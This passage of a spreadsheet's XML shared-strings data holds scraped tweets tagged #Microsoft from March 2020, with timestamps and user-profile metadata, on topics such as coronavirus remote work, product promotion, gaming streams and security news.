'profile_banner_url': 'https://pbs.twimg.com/profile_banners/862835977/1482181922', 'profile_link_color': 'FAB81E',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</si>
  <si>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03:47:28 +0000 2020</t>
  </si>
  <si>
    <t>Ref Assist App 
Match Day - no paper work
All results available LIVE 
Tech: #Microsoft #Azure ##Xamarin #Android #FireBase #CloudComputing 
The App is for LFAs (SA only)  https://t.co/pL1TvaZy5J</t>
  </si>
  <si>
    <t>{'id': 1092737833641697280, 'id_str': '1092737833641697280', 'name': 'TsamayaApp', 'screen_name': 'TsamayaApp', 'location': 'Midrand, South Africa', 'description': 'We promote Local Football Associations     Official website: https://t.co/wypUlupfaM FIND YOUR LEAGUE', 'url': 'https://t.co/bkIsMqpiMG', 'entities': {'url': {'urls': [{'url': 'https://t.co/bkIsMqpiMG', 'expanded_url': 'https://play.google.com/store/apps/details?id=com.africanplan.tsamaya.TSAMAYA_Droid&amp;hl=en_US', 'display_url': 'play.google.com/store/apps/detâ€¦', 'indices': [0, 23]}]}, 'description': {'urls': [{'url': 'https://t.co/wypUlupfaM', 'expanded_url': 'http://www.tsamayaapp.co.za', 'display_url': 'tsamayaapp.co.za', 'indices': [61, 84]}]}}, 'protected': False, 'followers_count': 32, 'friends_count': 175, 'listed_count': 0, 'created_at': 'Tue Feb 05 10:52:56 +0000 2019', 'favourites_count': 106, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 129, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'F5F8FA', 'profile_background_image_url': None, 'profile_background_image_url_https': None, 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1092740229260341250/zRPrqswq_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1092740229260341250/zRPrqswq_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1092737833641697280/1549364689',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</si>
  <si>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03:46:32 +0000 2020</t>
  </si>
  <si>
    <t>Post vacation I had a small moment of insanity questioning how to search email in #outlook and how I use to ever search email in the past.
Till I realized #microsoft did a sly change. 
RIP helpdesk people https://t.co/fbEyDAtKUN</t>
  </si>
  <si>
    <t>{'id': 730598162553929728, 'id_str': '730598162553929728', 'name': 'Joe Burrows', 'screen_name': 'CiresonJoe', 'location': 'Cyberspace', 'description': 'Microsoft Techie - Docker Whale Whisperer - AzureDevOps CI\\CD Pipeline Seer - Automation Connoisseur - Professional ContainerMaker - System Center Expert', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 112, 'friends_count': 319, 'listed_count': 2, 'created_at': 'Thu May 12 03:19:10 +0000 2016', 'favourites_count': 317, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 162, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'F5F8FA', 'profile_background_image_url': None, 'profile_background_image_url_https': None, 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1174158569739935745/UWje6L6B_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1174158569739935745/UWje6L6B_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/730598162553929728/1469097181',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</si>
  <si>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03:45:59 +0000 2020</t>
  </si>
  <si>
    <t>Microsoft 44 million users reused credentials hacked in early 2019 #Microsoft #Breaches #CyberSecurity #Password #Username #Hacking https://t.co/e4kCuPXU7M</t>
  </si>
  <si>
    <t>{'id': 312613411, 'id_str': '312613411', 'name': 'NeosLab', 'screen_name': 'neoslabDev', 'location': 'New York', 'description': 'NeosLab is a trusted #cybersecurity firm specialized in #hacking #networking #forensics #socialengineering #pentesting #exploitation #zeroday #bugbounty', 'url': 'https://t.co/JBh7zLOhE9', 'entities': {'url': {'urls': [{'url': 'https://t.co/JBh7zLOhE9', 'expanded_url': 'https://neoslab.com', 'display_url': 'neoslab.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 39066, 'friends_count': 2422, 'listed_count': 568, 'created_at': 'Tue Jun 07 11:57:28 +0000 2011', 'favourites_count': 124, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 701,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'http://pbs.twimg.com/profile_images/1222915593394966533/QbowFFJu_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1222915593394966533/QbowFFJu_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/312613411/1575337003', 'profile_link_color': '346161',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</si>
  <si>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03:44:59 +0000 2020</t>
  </si>
  <si>
    <t>For the second post in our #Office365 series, learn how #MicrosoftTeams helps you communicate and collaborate. #Microsoft
https://t.co/dVKVaM4We0</t>
  </si>
  <si>
    <t>{'id': 956974856, 'id_str': '956974856', 'name': 'Marketing AFON', 'screen_name': 'AFON_SG', 'location': 'Singapore', 'description': 'Award-winning provider of ERP solutions by SAP, Microsoft, Sage, and Netsuite in Singapore. Follow us to stay connected on products, industry trends and more!', 'url': 'http://t.co/s4HHtDE0', 'entities': {'url': {'urls': [{'url': 'http://t.co/s4HHtDE0', 'expanded_url': 'http://www.afon.com.sg', 'display_url': 'afon.com.sg', 'indices': [0, 20]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 59, 'friends_count': 182, 'listed_count': 1, 'created_at': 'Mon Nov 19 08:00:37 +0000 2012', 'favourites_count': 70, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 419, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'B7E1F0', 'profile_background_image_url': 'http://abs.twimg.com/images/themes/theme1/bg.png', 'profile_background_image_url_https': 'https://abs.twimg.com/images/themes/theme1/bg.png', 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/892225669492465664/yZlkflCf_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/892225669492465664/yZlkflCf_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/956974856/1560306924',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</si>
  <si>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03:40:20 +0000 2020</t>
  </si>
  <si>
    <t>In only a couple of days, both #Amazon and #Microsoft became remote-first companies! (at least in #Seattle for now!) #seattlecoronavirus #remotework</t>
  </si>
  <si>
    <t>{'id': 7620612, 'id_str': '7620612', 'name': 'Corentin Cremet', 'screen_name': 'orka1000', 'location': 'London, England', 'description': 'Founder Orka Fwd | Partnering with companies building better products faster', 'url': 'https://t.co/zT6X9GGqZs', 'entities': {'url': {'urls': [{'url': 'https://t.co/zT6X9GGqZs', 'expanded_url': 'http://linkedin.com/in/corentin', 'display_url': 'linkedin.com/in/corentin', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 2843, 'friends_count': 3541, 'listed_count': 285, 'created_at': 'Fri Jul 20 23:37:07 +0000 2007', 'favourites_count': 4941, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 11803,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'http://pbs.twimg.com/profile_images/959786059235250179/c80w4CRg_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/959786059235250179/c80w4CRg_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/7620612/1580465434', 'profile_link_color': '489BF7', 'profile_sidebar_border_color': 'FFFFFF', 'profile_sidebar_fill_color': 'DEE5CC', 'profile_text_color': '1E90B3', 'profile_use_background_image': True, 'has_extended_profile': True, 'default_profile': False, 'default_profile_image': False, 'following': None, 'follow_request_sent': None, 'notifications': None, 'translator_type': 'none'}</t>
  </si>
  <si>
    <t>Thu Mar 05 03:40:10 +0000 2020</t>
  </si>
  <si>
    <t>Sailing the Seven Seas | Sub Goal: 2/10  https://t.co/yCF3AOgQi2 #SeaOfThieves #sailing #pirates #adventure #live #twitch #twitchtv #twitchstreamer #twitchcommunity #TwitchAffilate #pc #pcgaming #microsoft #hangout #gaming</t>
  </si>
  <si>
    <t>Thu Mar 05 03:38:00 +0000 2020</t>
  </si>
  <si>
    <t>What if there was a way for #faster, easier, and more powerful ways to connect #SQLServer processes across your #IT environment? Spoiler Alert: there is! https://t.co/JAfH3sGTVS #ActiveBatch #SSIS #Automation #Microsoft #batchprocess #integration #ITAutomation https://t.co/kLYQn8OkgA</t>
  </si>
  <si>
    <t>{'id': 45925982, 'id_str': '45925982', 'name': 'ActiveBatch IT Automation', 'screen_name': 'ActiveBatch', 'location': 'United States', 'description': 'ActiveBatch Workload Automation and Job Scheduling coordinates and consolidates automated processes for dynamic enterprise-wide task orchestration &amp; visibility.', 'url': 'https://t.co/Up8RQpf3p6', 'entities': {'url': {'urls': [{'url': 'https://t.co/Up8RQpf3p6', 'expanded_url': 'https://www.advsyscon.com/', 'display_url': 'advsyscon.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 1731, 'friends_count': 2502, 'listed_count': 270, 'created_at': 'Tue Jun 09 19:58:03 +0000 2009', 'favourites_count': 1670, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 14219,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'http://pbs.twimg.com/profile_images/1158442973597769730/XOc_-_TB_normal.png', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1158442973597769730/XOc_-_TB_normal.png', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/45925982/1575477263', 'profile_link_color': '1C629F', 'profile_sidebar_border_color': 'FFFFFF', 'profile_sidebar_fill_color': 'E9EFF2', 'profile_text_color': '002A56', 'profile_use_background_image': True, 'has_extended_profile': True, 'default_profile': False, 'default_profile_image': False, 'following': None, 'follow_request_sent': None, 'notifications': None, 'translator_type': 'none'}</t>
  </si>
  <si>
    <t>Thu Mar 05 03:37:00 +0000 2020</t>
  </si>
  <si>
    <t>#Microsoft asks Seattle area and Bay Area employees to work from home because or #coronavirus.  https://t.co/tMlHgvl1Qu</t>
  </si>
  <si>
    <t>{'id': 1214572526539616257, 'id_str': '1214572526539616257', 'name': 'US-Asia Monitor', 'screen_name': 'USMAinDC', 'location': 'Washington, DC', 'description': 'Monitoring significant events, policies, and actions that contribute to the larger US-Asia discussion in Washington DC\n\nshare with us your stories and insights!', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 49, 'friends_count': 23, 'listed_count': 1, 'created_at': 'Tue Jan 07 15:40:45 +0000 2020', 'favourites_count': 2144, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 601, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'F5F8FA', 'profile_background_image_url': None, 'profile_background_image_url_https': None, 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1215990768118222848/jxnSn2VI_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1215990768118222848/jxnSn2VI_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1214572526539616257/1578749529',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</si>
  <si>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03:36:26 +0000 2020</t>
  </si>
  <si>
    <t>If you receive multiple emails from me when Im sending from my iPhone, its Outlook for iOS not me being an idiot. #outlook #microsoft  https://t.co/0BbxsV3iUK</t>
  </si>
  <si>
    <t>{'id': 6757522, 'id_str': '6757522', 'name': 'Lowell Davis', 'screen_name': 'lowelldavis', 'location': 'Iowa', 'description': 'Dad. Husband. Chicago Cubs and Iowa State Cyclones fan. #Liberty #MolonLabe', 'url': 'https://t.co/0N5TB7EgGm', 'entities': {'url': {'urls': [{'url': 'https://t.co/0N5TB7EgGm', 'expanded_url': 'http://www.lowelldavis.net', 'display_url': 'lowelldavis.net', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 332, 'friends_count': 1534, 'listed_count': 7, 'created_at': 'Tue Jun 12 03:31:24 +0000 2007', 'favourites_count': 1213, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 8022, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'FFF9E9', 'profile_background_image_url': 'http://abs.twimg.com/images/themes/theme15/bg.png', 'profile_background_image_url_https': 'https://abs.twimg.com/images/themes/theme15/bg.png', 'profile_background_tile': True, 'profile_image_url': 'http://pbs.twimg.com/profile_images/786667731638689792/Gz9G1LKI_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/786667731638689792/Gz9G1LKI_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/6757522/1404223694', 'profile_link_color': '0A1CDA', 'profile_sidebar_border_color': '373732', 'profile_sidebar_fill_color': '6E7393', 'profile_text_color': '000000', 'profile_use_background_image': True, 'has_extended_profile': True, 'default_profile': False, 'default_profile_image': False, 'following': None, 'follow_request_sent': None, 'notifications': None, 'translator_type': 'none'}</t>
  </si>
  <si>
    <t>Thu Mar 05 03:36:08 +0000 2020</t>
  </si>
  <si>
    <t>Installing Microsoft SQL Server 2016 https://t.co/YMWd3RKvoi via @YouTube #Microsoft #SQL #Server #MSSQL #MicrosoftSQL #SQLServer #SystemAdmin #Tech #Technology</t>
  </si>
  <si>
    <t>Thu Mar 05 03:35:29 +0000 2020</t>
  </si>
  <si>
    <t>Microsoft asks Seattle area and Bay Area employees to work from home via  @BusinessInsider https://t.co/IllFlasLGX #Microsoft #Coronavirus #WorkFromHome</t>
  </si>
  <si>
    <t>{'id': 29733577, 'id_str': '29733577', 'name': 'Danita Blackwood', 'screen_name': 'DanitaBlackwood', 'location': '', 'description': '#Writer on many formats &amp; platforms/ #SocialMedia/ #Marketing / #Publicist/ Produced USAâ€™s top rated local AM TV #news/Former TV #reporter/#animal lover/', 'url': 'https://t.co/llJiPWeexJ', 'entities': {'url': {'urls': [{'url': 'https://t.co/llJiPWeexJ', 'expanded_url': 'http://danitablackwood.com/', 'display_url': 'danitablackwood.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 14838, 'friends_count': 11607, 'listed_count': 2152, 'created_at': 'Wed Apr 08 15:00:37 +0000 2009', 'favourites_count': 57028, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 178929,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'http://pbs.twimg.com/profile_images/794430257482829824/KFUByDYF_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/794430257482829824/KFUByDYF_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/29733577/1353104145',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</si>
  <si>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Thu Mar 05 03:31:32 +0000 2020</t>
  </si>
  <si>
    <t>Bill Gates and Hiroshi Yamauchi already had a joint project in 1996 and Microsoft would pay 25 billion for Nintendo to be the first Xbox exclusive developer in 2000. #Nintendo #Microsoft #Xbox #90s https://t.co/VCJpbSXNcw</t>
  </si>
  <si>
    <t>{'id': 1215295963700568064, 'id_str': '1215295963700568064', 'name': 'ðŸ‡ºðŸ‡¸ðŸŽ®Sonny MonterabitsðŸŽ®ðŸ‡§ðŸ‡·', 'screen_name': 'Monterabits', 'location': 'English / PortuguÃªs', 'description': 'Games Researcher / Game Story Writer / Game Maker / Game Programmer / #RetroGaming / #RetroComputing / #Games and #Movies and #Music from the #1980s and #1990s', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 220, 'friends_count': 940, 'listed_count': 1, 'created_at': 'Thu Jan 09 15:35:17 +0000 2020', 'favourites_count': 1, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 150, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'F5F8FA', 'profile_background_image_url': None, 'profile_background_image_url_https': None, 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1219422680962740225/e7784wjQ_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1219422680962740225/e7784wjQ_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1215295963700568064/1583024365',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</si>
  <si>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03:30:12 +0000 2020</t>
  </si>
  <si>
    <t>If sex, then for a long time. All night long 
 #microsoft #ku https://t.co/MFC95LfbUk</t>
  </si>
  <si>
    <t>{'id': 1235237264533450756, 'id_str': '1235237264533450756', 'name': 'Ruby Cordero', 'screen_name': 'RubyCordero14', 'location': 'Billings, USA', 'description': 'I will love you until the stars go out, and the tides no longer turn.', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 8, 'friends_count': 38, 'listed_count': 0, 'created_at': 'Wed Mar 04 16:14:55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'http://pbs.twimg.com/profile_images/1235243957862490112/00Z265Hc_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1235243957862490112/00Z265Hc_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1235237264533450756/1583340113',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</si>
  <si>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03:21:39 +0000 2020</t>
  </si>
  <si>
    <t>@amlivemon And you can be sure China will move business away from them.....I expect they will diversify a little , but still keep a big footprint in China in order to keep market share.  #apple #google #microsoft . With #biden , it will be back to globalization as usual.</t>
  </si>
  <si>
    <t>{'id': 282582457, 'id_str': '282582457', 'name': 'evolve or die', 'screen_name': 'LifeisaGameCa', 'location': 'Canada', 'description': 'appreciating not everything as it seems/ as it should be. cutting through daily BS 2 c the simple truths. reboot 2 a decentralized future', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 125, 'friends_count': 785, 'listed_count': 3, 'created_at': 'Fri Apr 15 13:53:51 +0000 2011', 'favourites_count': 7611, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 11599,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'http://pbs.twimg.com/profile_images/1312510153/greenfairy_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1312510153/greenfairy_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/282582457/1354738083',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</si>
  <si>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03:19:30 +0000 2020</t>
  </si>
  <si>
    <t>Thanks to the #Microsoft #Africa #Development Center for making this happen.</t>
  </si>
  <si>
    <t>Some MSPs have been traveling since yesterday night for more than 7 hours. To participate in today's activities. I can't wait to see how the day unfolds.
#Microsoft #MSFTStudentPartner @MSPInspire @IamPablo</t>
  </si>
  <si>
    <t>Thu Mar 05 03:19:29 +0000 2020</t>
  </si>
  <si>
    <t>After more than three weeks of planning, late night calls, meeting after meeting, I am excited that today all Microsoft Student Partners from Kenya will be meeting at the Microsoft Africa Development Center (ADC) in Nairobi. 
#Microsoft #MSFTStudentPartner
#ADC @IamPablo</t>
  </si>
  <si>
    <t>Thu Mar 05 03:19:14 +0000 2020</t>
  </si>
  <si>
    <t>New #Podcast is out and we're talking Business Central March 2020 news, Late Payment Prediction functionality included within Business Central, and top 10 things you need to know about Business Central Apps.
https://t.co/jgCOObwIqc
#MSDyn365bc #Microsoft #apps #extensions</t>
  </si>
  <si>
    <t>Thu Mar 05 03:19:11 +0000 2020</t>
  </si>
  <si>
    <t>What's the difference between a Microsoft Dynamics 365 Business Central Team Member and a Dynamics NAV Limited User? Find out here:
https://t.co/e6TMQ3fRCQ
#Microsoft #MSDyn365bc #MSDynNAV #NAV #Navision #ERP #TeamMember #Users #LimitedUser "</t>
  </si>
  <si>
    <t>Thu Mar 05 03:17:04 +0000 2020</t>
  </si>
  <si>
    <t>I cant taste my lips, could you do it for me? #Cambria County   #mundo #microsoft https://t.co/A4uT0syS7F</t>
  </si>
  <si>
    <t>{'id': 1235129597890613249, 'id_str': '1235129597890613249', 'name': 'Jessica Nelson', 'screen_name': 'saddcicelo', 'location': 'Billings, USA', 'description': 'A successful marriage requires falling in love many times, always with the same person', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 6, 'friends_count': 27, 'listed_count': 0, 'created_at': 'Wed Mar 04 09:07:05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'http://pbs.twimg.com/profile_images/1235144931821395969/knFmy0Me_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1235144931821395969/knFmy0Me_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1235129597890613249/1583316520',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</si>
  <si>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03:16:32 +0000 2020</t>
  </si>
  <si>
    <t>Preserving the past and growing a fashion business using AI New York City's fashion darling Emily Adams Bode is known for designs that are a nod to antique textiles and craftsmanship. $MSFT Technology #Microsoft #CustomVision #AI https://t.co/FXIM1zcGzR</t>
  </si>
  <si>
    <t>{'id': 229597766, 'id_str': '229597766', 'name': 'LNP Services', 'screen_name': 'LNPServices', 'location': 'Las Vegas â€¢ New York â€¢ International', 'description': 'Award-Winning Designers | #LogoDesign | #ServerManagement | IoE - IoX - M2M | #BigData | #ISV | #ERP | #Fintech #Blockchain #AI #IoT #IIoT #CyberSecurity #Edge', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 59938, 'friends_count': 11980, 'listed_count': 713, 'created_at': 'Wed Dec 22 20:35:54 +0000 2010', 'favourites_count': 28785, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 38551, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': '363C44', 'profile_background_image_url': 'http://abs.twimg.com/images/themes/theme1/bg.png', 'profile_background_image_url_https': 'https://abs.twimg.com/images/themes/theme1/bg.png', 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1228046996503588864/55Qxg5cm_normal.png', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1228046996503588864/55Qxg5cm_normal.png', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/229597766/1582088312', 'profile_link_color': '0052A5', 'profile_sidebar_border_color': '000000', 'profile_sidebar_fill_color': 'DAECF4', 'profile_text_color': '145C8C', 'profile_use_background_image': True, 'has_extended_profile': False, 'default_profile': False, 'default_profile_image': False, 'following': None, 'follow_request_sent': None, 'notifications': None, 'translator_type': 'none'}</t>
  </si>
  <si>
    <t>Thu Mar 05 03:14:35 +0000 2020</t>
  </si>
  <si>
    <t>When it comes to holes and back doors, #microsoft is a special case https://t.co/lvo8wp6Bdc</t>
  </si>
  <si>
    <t>Thu Mar 05 03:14:25 +0000 2020</t>
  </si>
  <si>
    <t>https://t.co/4ltXhRYWZ9  
LIVE ON MIXER STREAMING HALO 5 #microsoft #mixer #hype #halo #streamer #gamer #creator #gaming #twitch #followme  https://t.co/4ltXhRYWZ9</t>
  </si>
  <si>
    <t>{'id': 320631901, 'id_str': '320631901', 'name': 'dre', 'screen_name': 'ItsRapscallion', 'location': 'United States', 'description': 'Video Game streamer on Mixer. Live stream a minimum of 30 hours a week. On the road to 2,000 followers and a mixer partnership! #mixer #xboxone #microsoft', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 229, 'friends_count': 82, 'listed_count': 2, 'created_at': 'Mon Jun 20 07:46:43 +0000 2011', 'favourites_count': 2195, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 18700,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True, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1235828617914929159/jkTChqyN_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1235828617914929159/jkTChqyN_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/320631901/1581173056', 'profile_link_color': '2FC2EF',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</si>
  <si>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Mar 05 03:11:06 +0000 2020</t>
  </si>
  <si>
    <t>#microsoft #powershell is NOT for "Linux" or #gnu but Microsoft is just googlebombing those brands to promote #proprietarysoftware entrapment</t>
  </si>
  <si>
    <t>Thu Mar 05 03:09:38 +0000 2020</t>
  </si>
  <si>
    <t>Working from home for the next three weeks. Grateful to #Microsoft for taking #Covid_19 seriously.</t>
  </si>
  <si>
    <t>{'id': 30319346, 'id_str': '30319346', 'name': 'Michael Scovetta', 'screen_name': 'scovetta', 'location': 'Washington', 'description': 'Security things at Microsoft. Open source. Security tools. SDL. Some other stuff.', 'url': 'https://t.co/OjOKbctZfo', 'entities': {'url': {'urls': [{'url': 'https://t.co/OjOKbctZfo', 'expanded_url': 'http://www.scovetta.com', 'display_url': 'scovetta.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 340, 'friends_count': 500, 'listed_count': 12, 'created_at': 'Fri Apr 10 21:36:54 +0000 2009', 'favourites_count': 226, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 2113,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'http://pbs.twimg.com/profile_images/564672703550857217/HOZS0HRn_normal.jpeg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/564672703550857217/HOZS0HRn_normal.jpeg',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</si>
  <si>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03:06:35 +0000 2020</t>
  </si>
  <si>
    <t>via #BleepingComputer Blog: "YouTube Web Site Subscriptions are Broken, Videos Not Displayed:" https://t.co/jQfbqh87yi
.
.
.
#Microsoft #Linux #blog #virtualization #cloudcomputing #cloud #security #ransomeware</t>
  </si>
  <si>
    <t>Thu Mar 05 03:04:23 +0000 2020</t>
  </si>
  <si>
    <t>#Microsoft #licensing for #Office365 #O365 #Dynamics365 #D365 #SCCM #InTune #Windows10 #WindowsServer #Office2019 #SQLServer #VolumeLicensing #Azure #PowerBI #VisualStudio and more 15-20% below cost. Visit https://t.co/fi8EHzgF9M or Call (888)511-0143 . #ItGurusOfAtlanta https://t.co/j9MF1FAdnQ</t>
  </si>
  <si>
    <t>Thu Mar 05 03:02:25 +0000 2020</t>
  </si>
  <si>
    <t>#SharePoint #Office365 #Microsoft  - Azure Function Filters  https://t.co/xYjcR2pnkC</t>
  </si>
  <si>
    <t>Thu Mar 05 03:00:48 +0000 2020</t>
  </si>
  <si>
    <t>Avanade offers #Microsoft #Dynamics AX Development Services covering Mobile Apps, Integraions, ERP and CRM --&amp;gt; https://t.co/NCQlRwXE4o &amp;lt;-- March 04, 2020 at 10:00PM</t>
  </si>
  <si>
    <t>Thu Mar 05 03:00:23 +0000 2020</t>
  </si>
  <si>
    <t>You can now allow or restrict the login using social accounts for your CRM  #Facebook #Google #Microsoft #Twitter by following the steps on this link - https://t.co/UTKn9mbgGx https://t.co/v9P5PJC6xd</t>
  </si>
  <si>
    <t>{'id': 909764311165239298, 'id_str': '909764311165239298', 'name': 'ngDesk', 'screen_name': 'ngDesk', 'location': 'Dallas, TX', 'description': '100% free next gen help desk platform', 'url': 'https://t.co/0UVzREIpkO', 'entities': {'url': {'urls': [{'url': 'https://t.co/0UVzREIpkO', 'expanded_url': 'https://www.ngdesk.com/', 'display_url': 'ngdesk.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 72, 'friends_count': 91, 'listed_count': 4, 'created_at': 'Mon Sep 18 13:01:29 +0000 2017', 'favourites_count': 7, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 1447, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'F5F8FA', 'profile_background_image_url': None, 'profile_background_image_url_https': None, 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/909765119835385857/ayxyb1A__normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/909765119835385857/ayxyb1A__normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/909764311165239298/1505740140',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</si>
  <si>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02:57:11 +0000 2020</t>
  </si>
  <si>
    <t>#Microsoft Asks Staff in #Seattle Area, #SiliconValley to Work from Home Amid #Coronavirus Scare
https://t.co/T5qTXOVydp</t>
  </si>
  <si>
    <t>{'id': 3647735240, 'id_str': '3647735240', 'name': 'Anuja Jaiswal', 'screen_name': 'anujajTOI', 'location': 'Agra, West UP', 'description': 'journalist @timesofindia. Ex- @thetribunechd Views expressed here are personal, RTs are not endorsements', 'url': 'https://t.co/n2KvW6rD6Z', 'entities': {'url': {'urls': [{'url': 'https://t.co/n2KvW6rD6Z', 'expanded_url': 'http://timesofindia.indiatimes.com/toireporter/author-Anuja-Jaiswal.cms', 'display_url': 'timesofindia.indiatimes.com/toireporter/auâ€¦', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 1733, 'friends_count': 774, 'listed_count': 36, 'created_at': 'Tue Sep 22 10:35:07 +0000 2015', 'favourites_count': 2117, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 8229,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'http://pbs.twimg.com/profile_images/1154934613611094017/jLpbyqNF_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1154934613611094017/jLpbyqNF_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/3647735240/1570931291',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</si>
  <si>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02:55:39 +0000 2020</t>
  </si>
  <si>
    <t>Innovating to drive the future of intelligent retail
#NRF 2020 #Microsoft
https://t.co/BUWhwn8Mqo</t>
  </si>
  <si>
    <t>Innovating to drive the future of intelligent retail
#Featured #Microsoft
https://t.co/BUWhwn8Mqo</t>
  </si>
  <si>
    <t>Thu Mar 05 02:55:37 +0000 2020</t>
  </si>
  <si>
    <t>Microsoft will be carbon negative by 2030
#carbon footprint #Microsoft
https://t.co/eZofWaaTFJ</t>
  </si>
  <si>
    <t>Thu Mar 05 02:55:34 +0000 2020</t>
  </si>
  <si>
    <t>Thu Mar 05 02:55:33 +0000 2020</t>
  </si>
  <si>
    <t>Thu Mar 05 02:55:31 +0000 2020</t>
  </si>
  <si>
    <t>Thu Mar 05 02:55:30 +0000 2020</t>
  </si>
  <si>
    <t>We are the dream of our ancestors
#The Official Microsoft Blog #Microsoft
https://t.co/PYx8yD7XM8</t>
  </si>
  <si>
    <t>Thu Mar 05 02:55:29 +0000 2020</t>
  </si>
  <si>
